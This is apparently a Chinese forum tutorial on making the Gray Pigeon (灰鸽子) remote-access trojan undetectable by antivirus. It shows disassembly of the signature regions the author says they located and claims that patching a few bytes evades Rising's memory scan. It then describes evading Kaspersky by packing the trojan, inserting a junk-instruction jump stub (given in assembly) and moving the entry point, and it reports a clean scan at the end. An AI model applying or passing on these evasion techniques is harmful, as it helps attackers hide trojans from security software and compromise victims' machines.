今天做官方鸽子免杀,首先找鸽子的特征码,不浪费大家时间,我已经找好了。
0049AEC0 /EB 08 jmp short 00470000.0049AECA
0049AEC2 |8B45 FC mov eax,dword ptr ss:[ebp-4]
0049AEC5 |8B08 mov ecx,dword ptr ds:[eax]
0049AEC7 |FF51 F0 call dword ptr ds:[ecx-10]
0049AECA \5F pop edi
0049AECB 5E pop esi
0049AECC 5B pop ebx
0049AECD 59 pop ecx
0049AECE 5D pop ebp
0049AECF C3 retn
0049AED0 42 inc edx
0049AED1 45 inc ebp
0049AED2 49 dec ecx
0049AED3 5F pop edi
0049AED4 5A pop edx
0049AED5 48 dec eax
0049AED6 55 push ebp
0049AED7 0053 4F add byte ptr ds:[ebx+4F],dl
0049AEDA 46 inc esi
0049AEDB 54 push esp
0049AEDC 57 push edi
0049AEDD 41 inc ecx
0049AEDE 52 push edx
0049AEDF 45 inc ebp
004701F0 6361 74 arpl word ptr ds:[ecx+74],sp
004701F3 696F 6E 127361>imul ebp,dword ptr ds:[edi+6E],55617312
004701FA 73 65 jnb short 00450003.00470261
004701FC 72 6E jb short 00450003.0047026C
004701FE 61 popad
004701FF 6D ins dword ptr es:[edi],dx
00458D82 6F outs dx,dword ptr es:[edi]
00458D83 6365 73 arpl word ptr ss:[ebp+73],sp
00458D86 73 33 jnb short 复件_Ser.00458DBB
00458D88 324E 65 xor cl,byte ptr ds:[esi+65]
00458D8B 78 74 js short 复件_Ser.00458E01
00458D8D 0000 add byte ptr ds:[eax],al
00458D8F 0050 72 add byte ptr ds:[eax+72],dl
00458D00 43 inc ebx
00458D01 72 65 jb short 复件_Ser.00458D68
00458D03 61 popad
00458D04 74 65 je short 复件_Ser.00458D6B
00458D06 54 push esp
00458D07 6F outs dx,dword ptr es:[edi]
00458D08 6F outs dx,dword ptr es:[edi]
00458D09 6C ins byte ptr es:[edi],dx
00458D0A 68 656C7033 push 33706C65
00458D0F 3253 6E xor dl,byte ptr ds:[ebx+6E]
改几处就可以了,看吧多了瑞星内存吧!刚才杀的是鸽子的控制端。过了吧`
在过卡巴,用木马彩衣加个壳,在用花指令跳转一下,
push ebp
mov ebp,esp
mov ecx,33
push 0
push 0
dec ecx
jnz 入口点
004C60C5 1> 55 push ebp
004C60FF 0000 add byte ptr ds:[eax],al
在改一下入口点就可以了。
来测试一下,等一下`有点慢
,卡死,绝对扫不出来`等等看哈。^-^
OK,一切顺利。 |
官方鸽子免杀
